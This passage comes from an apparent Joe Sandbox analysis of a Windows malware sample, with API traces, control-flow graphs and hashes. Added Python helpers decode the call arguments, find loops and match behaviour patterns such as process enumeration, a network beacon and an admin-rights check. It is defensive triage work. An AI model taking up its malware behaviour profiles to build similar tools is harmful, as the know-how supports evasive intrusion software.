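The three function listings above (CreateProcessA with two CloseHandle calls, the CreateToolhelp32Snapshot/Process32First/Process32Next enumeration loop, and the socket/gethostbyname/connect/send/recv/closesocket function) are the sort of per-function API traces an analyst reads off a sandbox report by hand. The following triage helper is an added example, not part of this report or of Joe Security's tooling: it parses lines in the report's own `Name.Module(args), ref: ADDR` format, decodes the constant arguments the report shows (TH32CS_SNAPPROCESS for the snapshot flags, 0x128 as sizeof(PROCESSENTRY32) for a 32-bit ANSI build, DETACHED_PROCESS as dwCreationFlags, GENERIC_WRITE/CREATE_ALWAYS for the CreateFileA call listed further down), and flags behaviours as ordered API subsequences. One caveat it encodes: kernelbase.dll exports FindCloseChangeNotification at the same address as CloseHandle, so the report's `FindCloseChangeNotification.KERNELBASE(00000000)` entries are, in all likelihood, ordinary CloseHandle calls on the snapshot and file handles; the helper normalises that alias before matching. The sample input is constructed: the snapshot, CreateProcessA, CreateFileA and CloseHandle lines copy their addresses and arguments from the report, while the socket lines are rebuilt from the control-flow graph, which names the calls but gives no arguments, so their module name (WS2_32), argument placeholders and addresses (basic-block starts, not exact call sites) are assumptions.

```python
"""Triage helper for Joe Sandbox "APIs" listings.

Added example (not part of the sandbox report or of Joe Security's tooling):
parse `Name.Module(arg,...), ref: ADDR` lines, normalise symbol aliasing,
decode a few constant arguments and flag behaviours as ordered API subsequences.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed sample in the report's line format. Enumeration, CreateProcessA,
# CreateFileA and CloseHandle lines copy addresses/arguments from the report;
# the socket lines are rebuilt from the control-flow graph, so their module,
# '?' arguments and block-start addresses are assumptions.
SAMPLE_REPORT = """
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 001521D0
• Process32First.KERNEL32(00000000,00000128), ref: 00152257
• Process32Next.KERNEL32(00000000,00000128), ref: 00152384
• FindCloseChangeNotification.KERNELBASE(00000000), ref: 00152426
• CreateProcessA.KERNELBASE(?,00162CD6,00000000,00000000,00000000,00000008,00000000,00000000,00000044,?), ref: 0016FBF1
• CloseHandle.KERNEL32(00162CD6,?), ref: 0016FC2F
• CloseHandle.KERNEL32(?), ref: 0016FC58
• socket.WS2_32(?,?,?), ref: 00161786
• gethostbyname.WS2_32(?), ref: 001618C4
• connect.WS2_32(?,?,?), ref: 00161976
• send.WS2_32(?,?,?,?), ref: 001619E0
• recv.WS2_32(?,?,?,?), ref: 00161ACC
• closesocket.WS2_32(?), ref: 001621AD
• CreateFileA.KERNELBASE(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00151E7B
• WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00151F8B
• FindCloseChangeNotification.KERNELBASE(00000000), ref: 00152069
"""

API_LINE = re.compile(
    r"(?P<name>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")

# kernelbase.dll exports FindCloseChangeNotification at the same address as
# CloseHandle, so symbolisation reports the former for an ordinary CloseHandle.
ALIASES = {"FindCloseChangeNotification": "CloseHandle"}

TH32CS = {0x1: "TH32CS_SNAPHEAPLIST", 0x2: "TH32CS_SNAPPROCESS",
          0x4: "TH32CS_SNAPTHREAD", 0x8: "TH32CS_SNAPMODULE"}
CREATE_FLAGS = {0x4: "CREATE_SUSPENDED", 0x8: "DETACHED_PROCESS",
                0x10: "CREATE_NEW_CONSOLE", 0x8000000: "CREATE_NO_WINDOW"}
ACCESS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE"}
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
               4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}

# Ordered API subsequences that characterise a behaviour; unrelated calls may
# sit between the listed ones (subsequence match, not substring).
PATTERNS = {
    "process_enumeration": ["CreateToolhelp32Snapshot", "Process32First",
                            "Process32Next", "CloseHandle"],
    "process_creation": ["CreateProcessA", "CloseHandle"],
    "tcp_beacon": ["socket", "gethostbyname", "connect", "send", "recv", "closesocket"],
    "file_drop": ["CreateFileA", "WriteFile", "CloseHandle"],
    "service_control": ["RegisterServiceCtrlHandlerA", "SetServiceStatus"],
}


@dataclass
class Call:
    name: str
    module: str
    args: List[Optional[int]]  # None where the report prints '?'
    ref: int


def parse_api_lines(text: str) -> List[Call]:
    """Parse report lines; unknown ('?') arguments become None, hex becomes int."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.search(line)
        if not m:
            continue
        args = [None if a.strip() == "?" else int(a, 16)
                for a in m["args"].split(",") if a.strip()]
        calls.append(Call(ALIASES.get(m["name"], m["name"]), m["module"], args, int(m["ref"], 16)))
    return calls


def decode_flags(value: int, table: Dict[int, str]) -> str:
    names = [n for bit, n in table.items() if value & bit]
    return "|".join(names) if names else hex(value)


def annotate(call: Call) -> str:
    """Decode the constant arguments the report shows for the interesting calls."""
    a = call.args
    if call.name == "CreateToolhelp32Snapshot" and a and a[0] is not None:
        return "dwFlags=" + decode_flags(a[0], TH32CS)
    if call.name in ("Process32First", "Process32Next") and len(a) > 1 and a[1] == 0x128:
        return "dwSize=0x128 (sizeof(PROCESSENTRY32), 32-bit ANSI build)"
    if call.name == "CreateProcessA" and len(a) > 5 and a[5] is not None:
        return "dwCreationFlags=" + decode_flags(a[5], CREATE_FLAGS)
    if call.name == "CreateFileA" and len(a) > 4 and a[1] is not None and a[4] is not None:
        return "dwDesiredAccess=%s, dwCreationDisposition=%s" % (
            decode_flags(a[1], ACCESS), DISPOSITION.get(a[4], hex(a[4])))
    return ""


def match_sequence(calls: List[Call], seq: List[str]) -> Optional[List[int]]:
    """Greedy in-order match; returns the ref addresses of the matched calls, or None."""
    refs, i = [], 0
    for c in calls:
        if i < len(seq) and c.name == seq[i]:
            refs.append(c.ref)
            i += 1
    return refs if i == len(seq) else None


def classify(calls: List[Call]) -> Dict[str, List[int]]:
    found = {}
    for tag, seq in PATTERNS.items():
        refs = match_sequence(calls, seq)
        if refs is not None:
            found[tag] = refs
    return found


if __name__ == "__main__":
    parsed = parse_api_lines(SAMPLE_REPORT)
    for c in parsed:
        print(f"{c.ref:08X} {c.name:<26} {annotate(c)}")
    for tag, refs in classify(parsed).items():
        print(tag, [f"{r:08X}" for r in refs])
```

The subsequence match is deliberately loose, so run it per function (as the report groups its APIs listings) rather than over a whole trace, or a CloseHandle from one routine will complete a pattern started in another. The `service_control` pattern is included for the RegisterServiceCtrlHandler/SetServiceStatus function whose API ID appears at the top of this section but whose call lines are not on this page, so it does not fire on the sample.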

Control-flow Graph
• Graph image not reproduced (executed/not-executed colouring lost in extraction). Basic blocks 151d90-1520ca; calls 175df0 and 163110 in the entry block, 16fcc0 on the error paths, CreateFileA in block 151e4c-151e91, a loop over blocks 151f20-152063 calling 14b620, 16ff30 and WriteFile, then FindCloseChangeNotification and 16fcc0 in block 152069-15209c
APIs
  • Part of subcall function 00163110: WaitForSingleObject.KERNEL32(00000708,00004E20,?,00150A18,00000128,00000000,00000000,?,0015126B,?,001625B4,?,00000708,00000000), ref: 001631AD
• CreateFileA.KERNELBASE(?,40000000,00000000,00000000,00000002,00000000,00000000,00000000,?,?,?,?,?,?,-0000004B,00000009), ref: 00151E7B
  • Part of subcall function 0016FCC0: ReleaseMutex.KERNEL32(00150D8E,?,00150D8E,00000128,00000000), ref: 0016FCE9
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.2068966797.0000000000141000.00000020.00000001.01000000.00000005.sdmp, Offset: 00140000, based on PE: true
• Associated: 00000003.00000002.2068937876.0000000000140000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.2069001869.0000000000177000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.2069023405.000000000017C000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.2069023405.00000000001B0000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.2069023405.00000000001B4000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.2069023405.00000000001B7000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.2069023405.00000000001B9000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.2069023405.00000000001CA000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.2069190910.00000000001CB000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_140000_idtpqzltyfy.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CreateFileMutexObjectReleaseSingleWait
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1564016613-0
                                                                                                                                                                                                            • Opcode ID: 37c28564cba5a741b0206745fee1ea3b11a0d511c04560e6312677a5e70a4794
                                                                                                                                                                                                            • Instruction ID: 4c38f319b3cbb9f489e097b241f6d020158641a4adba2a40a042d69e04128246
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 37c28564cba5a741b0206745fee1ea3b11a0d511c04560e6312677a5e70a4794
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7D71F472611204DFC304DF64FC89A6A3BB9FB98315F418259E80697EB4DB709AE5CF81

Control-flow Graph
• Basic blocks (node: address range, imported APIs): 1693: 14b7a0-14b84c, AllocateAndInitializeSid; 1694: 14b861-14b864; 1695: 14b84e-14b85b; 1696: 14b8ee-14b90e; 1697: 14b86a-14b885, CheckTokenMembership; 1698: 14b8b4-14b8e8, FreeSid; 1699: 14b887-14b8ae
• Edges: 1693->1694, 1693->1695, 1694->1696, 1694->1697, 1695->1694, 1697->1698, 1697->1699, 1698->1696, 1699->1698
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 0014B82B
                                                                                                                                                                                                            • CheckTokenMembership.KERNELBASE(00000000,?,?), ref: 0014B87D
                                                                                                                                                                                                            • FreeSid.ADVAPI32(?), ref: 0014B8D6
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.2068966797.0000000000141000.00000020.00000001.01000000.00000005.sdmp, Offset: 00140000, based on PE: true
• Associated: 00000003.00000002.2068937876.0000000000140000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.2069001869.0000000000177000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.2069023405.000000000017C000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.2069023405.00000000001B0000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.2069023405.00000000001B4000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.2069023405.00000000001B7000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.2069023405.00000000001B9000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.2069023405.00000000001CA000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.2069190910.00000000001CB000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_140000_idtpqzltyfy.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3429775523-0
                                                                                                                                                                                                            • Opcode ID: 1e434bf8c9f31915622607fa10d4e0e72f03e96b0633d08eb81183e79bc3b665
                                                                                                                                                                                                            • Instruction ID: 837e2b70412a640a764e1ba25bcebfe3eee488d6fa528ad107c108dc0005887f
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1e434bf8c9f31915622607fa10d4e0e72f03e96b0633d08eb81183e79bc3b665
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 07319E75905248EFD704CFA8FDD99BA7BB8FB58304B01819AE40297AB0D7709AD4CB51
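The argument lists in the APIs bullets of the two records above are raw hex stack values, and the security-relevant meaning sits in a few of them: CreateFileA at 00151E7B requests GENERIC_WRITE (0x40000000) with creation disposition 2 (CREATE_ALWAYS, so an existing file is overwritten), and AllocateAndInitializeSid at 0014B82B builds a two-RID SID 0x20/0x220 (32/544) that is then handed to CheckTokenMembership with a NULL token, the standard "is the caller running as BUILTIN\Administrators" check. The following decoder is an added example, not part of the Joe Sandbox report: it takes the report's own API bullets (copied below as constructed input), splits off the formal parameters and names the constants. The identifier-authority pointer is shown as "?" by the sandbox, so the NT authority (S-1-5) is an assumption marked in the code; the constant tables and the function names are the example's own.

```python
import re

# Input: the "APIs" bullets copied from the two report records above
# (constructed list; the value after "ref:" is the call-site address).
REPORT_API_LINES = [
    "Part of subcall function 00163110: WaitForSingleObject.KERNEL32("
    "00000708,00004E20,?,00150A18,00000128,00000000,00000000,?,0015126B,?,"
    "001625B4,?,00000708,00000000), ref: 001631AD",
    "CreateFileA.KERNELBASE(?,40000000,00000000,00000000,00000002,00000000,"
    "00000000,00000000,?,?,?,?,?,?,-0000004B,00000009), ref: 00151E7B",
    "AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,"
    "00000000,00000000,00000000,00000000,00000000,?), ref: 0014B82B",
    "CheckTokenMembership.KERNELBASE(00000000,?,?), ref: 0014B87D",
]

API_LINE = re.compile(r"(\w+)\.(\w+)\((.*)\),\s*ref:\s*([0-9A-Fa-f]+)")

GENERIC_ACCESS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
                  0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL"}
SHARE_MODE = {0x1: "FILE_SHARE_READ", 0x2: "FILE_SHARE_WRITE", 0x4: "FILE_SHARE_DELETE"}
CREATION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
            4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
# Well-known RID pairs under SECURITY_NT_AUTHORITY (S-1-5-...).
WELL_KNOWN_RIDS = {(32, 544): "BUILTIN\\Administrators", (32, 545): "BUILTIN\\Users",
                   (32, 555): "BUILTIN\\Remote Desktop Users"}
INFINITE = 0xFFFFFFFF


def parse_api_line(line):
    """Split one report bullet into api, module, argument list and call site.
    '?' means the sandbox could not resolve the value (usually a pointer)."""
    m = API_LINE.search(line)
    if not m:
        return None
    name, module, raw, ref = m.groups()
    args = [None if t.strip() == "?" else int(t.strip(), 16) for t in raw.split(",")]
    return {"api": name, "module": module, "args": args, "ref": ref}


def flag_names(value, table):
    if value is None:
        return "?"
    names = [n for bit, n in table.items() if value & bit]
    return "|".join(names) if names else "0"


def decode(call):
    """Decode the formal parameters of the APIs that matter here. The sandbox
    dumps more stack slots than the API has parameters; the extra ones are
    leftovers from the caller's frame and are ignored."""
    a, out = call["args"], {}
    if call["api"] == "CreateFileA":          # (name, access, share, sa, disp, flags, template)
        out["access"] = flag_names(a[1], GENERIC_ACCESS)
        out["share"] = flag_names(a[2], SHARE_MODE)
        out["disposition"] = CREATION.get(a[4], hex(a[4]) if a[4] is not None else "?")
    elif call["api"] == "AllocateAndInitializeSid":  # (pAuthority, count, rid0..rid7, ppSid)
        count = a[1]
        rids = tuple(a[2:2 + count])
        # pAuthority is a pointer the report shows as '?'. Assumption: it points
        # at SECURITY_NT_AUTHORITY (5), the authority under which 32/544 is defined.
        out["sid_if_nt_authority"] = "S-1-5" + "".join(f"-{r}" for r in rids)
        out["name"] = WELL_KNOWN_RIDS.get(rids, "unknown")
        out["authority_resolved"] = a[0] is not None
    elif call["api"] == "CheckTokenMembership":  # (hToken, pSid, pIsMember)
        out["token"] = "caller's own token (NULL)" if a[0] == 0 else hex(a[0])
    elif call["api"] == "WaitForSingleObject":   # (hHandle, dwMilliseconds)
        out["timeout_ms"] = "INFINITE" if a[1] == INFINITE else a[1]
    return out


def decode_report(lines):
    results = []
    for line in lines:
        call = parse_api_line(line)
        if call:
            call["decoded"] = decode(call)
            results.append(call)
    return results


if __name__ == "__main__":
    for c in decode_report(REPORT_API_LINES):
        print(f"{c['ref']} {c['api']:26} {c['decoded']}")
```

Run against the four bullets, the output reads: a 20000 ms (0x4E20) wait in the subcall, a write-only, non-shared CREATE_ALWAYS file open, and a SID that resolves to BUILTIN\Administrators checked against the caller's own token. The admin check alone is not malicious (installers do the same), but together with the "Modifies existing windows services" and "Creates files inside the system directory" signatures in the overview it tells you the sample branches on whether it already has the rights those actions need.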

Control-flow Graph
• Basic blocks (node: address range, imported APIs): 1700: 152eb0-152ef9, GetProcessHeap, RtlFreeHeap; 1701: 152f30-152f42; 1702: 152efb-152f07; 1703: 152f09-152f19; 1704: 152f1a-152f2f; 1705: 152f44-152f50; 1706: 152f56-152f57
• Edges: 1700->1701, 1700->1702, 1701->1705, 1701->1706, 1702->1703, 1702->1704, 1705->1706
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000002,?,00151BE7,0016979D,0016979D,00000000,-00000002,00000000,?,0016979D,00000002,00000000), ref: 00152ED1
                                                                                                                                                                                                            • RtlFreeHeap.NTDLL(00000000,?,00151BE7,0016979D,0016979D,00000000,-00000002,00000000,?,0016979D,00000002,00000000), ref: 00152ED8
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.2068966797.0000000000141000.00000020.00000001.01000000.00000005.sdmp, Offset: 00140000, based on PE: true
• Associated: 00000003.00000002.2068937876.0000000000140000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.2069001869.0000000000177000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.2069023405.000000000017C000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.2069023405.00000000001B0000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.2069023405.00000000001B4000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.2069023405.00000000001B7000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.2069023405.00000000001B9000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.2069023405.00000000001CA000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.2069190910.00000000001CB000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_140000_idtpqzltyfy.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$FreeProcess
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3859560861-0
                                                                                                                                                                                                            • Opcode ID: 59c7adb539fa9924a3090a7480335d9ad5942488817bfa6c414050d21aedd6ee
                                                                                                                                                                                                            • Instruction ID: f30e63a88a2a06e5d576f11d18279de1a55d9d7526c50d3dd3a750582e1e580e
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 59c7adb539fa9924a3090a7480335d9ad5942488817bfa6c414050d21aedd6ee
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1301DF31608245CBC318DFA4FE668293BF9F7487207144206F51A8BEB0D330D8E98B15

Control-flow Graph
• Basic blocks (node: address range, imported APIs): 1707: 14a4e0-14a53a, lstrlen; 1708: 14a53c-14a548; 1709: 14a54e-14a564, CharLowerBuffA
• Edges: 1707->1708, 1707->1709, 1708->1709
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • lstrlen.KERNEL32(00152325,00000000,?,00152325,?), ref: 0014A4FE
                                                                                                                                                                                                            • CharLowerBuffA.USER32(00152325,00000000,?,00152325,?), ref: 0014A550
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.2068966797.0000000000141000.00000020.00000001.01000000.00000005.sdmp, Offset: 00140000, based on PE: true
• Associated: 00000003.00000002.2068937876.0000000000140000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.2069001869.0000000000177000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.2069023405.000000000017C000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.2069023405.00000000001B0000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.2069023405.00000000001B4000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.2069023405.00000000001B7000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.2069023405.00000000001B9000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.2069023405.00000000001CA000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.2069190910.00000000001CB000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_140000_idtpqzltyfy.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: BuffCharLowerlstrlen
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 794975171-0
                                                                                                                                                                                                            • Opcode ID: cb5344382e32d7667f7ad6ad5330b9229be933540e370482a7f9664a0f35c812
                                                                                                                                                                                                            • Instruction ID: 1e7763b11c5200db3712b05806d599bd6850ffa4db8f98c1eab530ff360ec9b2
                                                                                                                                                                                                            • Opcode Fuzzy Hash: cb5344382e32d7667f7ad6ad5330b9229be933540e370482a7f9664a0f35c812
                                                                                                                                                                                                            • Instruction Fuzzy Hash: CAF0CD71600220EFC3025F21FD4D5663BB8FF893613840512E48A86974E77489E2DFD2
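Each record above carries a control_flow_graph listing that Joe Sandbox emits as one run of tokens: a decimal node id followed by the block's address range, then any "call <addr>" targets and imported API names inside that block, with "src->dst" tokens for edges. The parser below is an added example, not part of the report or of Joe Sandbox: it tokenises that format, then finds loop back edges by depth-first search and the natural loop each one closes, so that an API inside a loop (here WriteFile in the function at 151d90) is separated from one called once (CreateFileA). The input is the raw listing of the 151d90 record, copied as a constructed string; the same parser handles the other four listings in this section.

```python
import re
from collections import defaultdict

# The control_flow_graph line of the function at 151d90, copied from the record
# above in the raw form Joe Sandbox emits (constructed input for this example).
CFG_TEXT = (
    "control_flow_graph 1665 151d90-151e21 call 175df0 call 163110 "
    "1670 151e23-151e4b call 16fcc0 1665->1670 1671 151e4c-151e91 CreateFileA "
    "1665->1671 1672 151ed1-151ef0 1671->1672 1673 151e93-151ed0 call 16fcc0 "
    "1671->1673 1676 151ef2-151f06 1672->1676 1677 151f0c-151f18 1672->1677 "
    "1676->1677 1680 151f20-151f3e 1677->1680 1681 151f40-151f57 1680->1681 "
    "1682 151f59-151f85 1680->1682 1683 151f8b-152063 call 14b620 call 16ff30 "
    "WriteFile 1681->1683 1682->1683 1683->1680 1688 152069-15209c "
    "FindCloseChangeNotification call 16fcc0 1683->1688 1690 1520a1-1520b6 "
    "1688->1690 1691 1520c2-1520ca 1690->1691 1692 1520b8 1690->1692 1692->1691"
)

# A block covers "start-end", or a single address for a one-instruction block.
ADDR_RANGE = re.compile(r"[0-9a-f]+(-[0-9a-f]+)?")


def parse_cfg(text):
    """Tokenise the listing into basic blocks (id, address range, internal
    call targets, imported API names) and directed edges."""
    toks = text.split()
    if toks[0] != "control_flow_graph":
        raise ValueError("not a control_flow_graph line")
    nodes, edges, order, cur = {}, [], [], None
    i = 1
    while i < len(toks):
        t = toks[i]
        if "->" in t:                                   # edge: src->dst
            s, d = t.split("->")
            edges.append((int(s), int(d)))
            i += 1
        elif t == "call":                               # internal call target
            cur["calls"].append(toks[i + 1])
            i += 2
        elif t.isdigit() and i + 1 < len(toks) and ADDR_RANGE.fullmatch(toks[i + 1]):
            cur = {"id": int(t), "range": toks[i + 1], "calls": [], "apis": []}
            nodes[cur["id"]] = cur                      # new basic block
            order.append(cur["id"])
            i += 2
        else:                                           # imported API name
            cur["apis"].append(t)
            i += 1
    return {"entry": order[0], "nodes": nodes, "edges": edges}


def back_edges(g):
    """Edges that close a loop: DFS from the entry block, an edge to a block
    still on the DFS stack is a back edge."""
    succ = defaultdict(list)
    for s, d in g["edges"]:
        succ[s].append(d)
    state, found = {}, []

    def visit(n):
        state[n] = "active"
        for m in succ[n]:
            if state.get(m) == "active":
                found.append((n, m))
            elif m not in state:
                visit(m)
        state[n] = "done"

    visit(g["entry"])
    return found


def natural_loop(g, back_edge):
    """Blocks of the loop closed by back_edge (tail -> header): the header plus
    every block that reaches the tail without passing through the header."""
    tail, header = back_edge
    preds = defaultdict(list)
    for s, d in g["edges"]:
        preds[d].append(s)
    body, work = {header, tail}, [tail]
    while work:
        n = work.pop()
        for p in preds[n]:
            if p not in body:
                body.add(p)
                work.append(p)
    return body


def apis_in_loops(g):
    """Map each API that is called from inside a loop to that loop's back edge."""
    out = {}
    for be in back_edges(g):
        for n in sorted(natural_loop(g, be)):
            for api in g["nodes"][n]["apis"]:
                out[api] = be
    return out


if __name__ == "__main__":
    g = parse_cfg(CFG_TEXT)
    for n in sorted(g["nodes"]):
        b = g["nodes"][n]
        print(f"{n}: {b['range']:14} calls={b['calls']} apis={b['apis']}")
    print("back edges:", back_edges(g))
    print("APIs inside loops:", apis_in_loops(g))
```

For the 151d90 function this yields one back edge, 1683->1680, whose loop body {1680, 1681, 1682, 1683} contains WriteFile, while CreateFileA (block 1671) and the close in block 1688 run once: the function opens a file and writes it out in chunks. One caveat when reading these listings: the API name is the export the sandbox resolved at the call target's address, and in kernel32 the export FindCloseChangeNotification shares its address with CloseHandle, so the close after the write loop is almost certainly CloseHandle on the file handle, not a change-notification handle.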

Control-flow Graph
• Basic blocks (node: address range, imported APIs): 1710: 14e2c0-14e2e2; 1711: 14e2e4-14e2ec; 1712: 14e2f2-14e306, GetProcessHeap, RtlAllocateHeap
• Edges: 1710->1711, 1710->1712, 1711->1712
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?,?,0017220A,02167FFC,?,?,?,?,0016463C), ref: 0014E2F8
                                                                                                                                                                                                            • RtlAllocateHeap.NTDLL(00000000,?,0017220A,02167FFC,?,?,?,?,0016463C), ref: 0014E2FF
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.2068966797.0000000000141000.00000020.00000001.01000000.00000005.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000003.00000002.2068937876.0000000000140000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069001869.0000000000177000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.000000000017C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001CA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069190910.00000000001CB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_140000_idtpqzltyfy.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$AllocateProcess
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1357844191-0
                                                                                                                                                                                                            • Opcode ID: 8416483f14de977ede38d531b499846a59f5f9a06fabc187798644c3ca993560
                                                                                                                                                                                                            • Instruction ID: baadc4dfb9003755db613a08ab54eecf014547e236bae513d1af665befb331d9
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8416483f14de977ede38d531b499846a59f5f9a06fabc187798644c3ca993560
                                                                                                                                                                                                            • Instruction Fuzzy Hash: B4E08C76104200AFC7089FA9FC8DA5633B8FB09305F144518FA0DC6AB2CB71E6C18B91
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateFileA.KERNELBASE(00000708,80000000,00000000,00000000,00000003,00000000,00000000,?,?,00000708,00000000), ref: 00150F65
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.2068966797.0000000000141000.00000020.00000001.01000000.00000005.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000003.00000002.2068937876.0000000000140000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069001869.0000000000177000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.000000000017C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B9000.00000004.00000001.01000000.00000005.sdmpDownload File
